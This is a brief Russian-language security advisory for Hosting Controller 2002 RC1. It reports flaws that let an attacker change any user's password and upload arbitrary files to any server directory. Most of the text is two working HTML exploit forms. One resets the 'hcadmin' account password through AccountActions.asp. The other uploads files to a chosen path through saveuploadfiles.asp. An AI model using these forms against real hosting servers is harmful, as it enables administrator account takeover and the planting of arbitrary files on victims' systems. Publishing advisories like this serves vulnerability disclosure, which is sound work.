Программа: Hosting Controller 2002 RC1

Уязвимости позволяют изменить пароль
любого пользователя и загрузить
произвольный файл в произвольную
директорию сервера.

Пример:

<form action="http://[URL]/admin/accounts/AccountActions.asp?ActionType=UpdateUser
" method="post"> Username: <input name="UserName"
value="hcadmin" type="text" size="50"> <br>
Name: <input name="FullName" value="g|25|h" type="text"
size="50"> <br> ChangePass (type true): <input type="checkbox"
name="PassCheck" value="TRUE"> <br> Password: <input
name="Pass1" title="Password"> <br> Confirm: <input
name="ConfPass" title="Password"> <br> <input
name="submit" value="submit" type="submit">
</form>

<form method="POST" action="http://[URL]/admin/folders/saveuploadfiles.asp"
enctype="multipart/form-data"> Where upload files: <input name="OpenPath"
value="E:\webspace\test"> <br> File 1: <input type="file"
name="file1" value><br> File 2: <input type="file"
name="file2" value><br> File 3: <input type="file"
name="file3" value><br> File 4: <input type="file"
name="file4" value><br> <input type="submit"
value="Upload Files" name="upload"><br> <br><br>
PS: If you see an error message, it’s not important. You just should have
authenticated access. </form>



Оставить мнение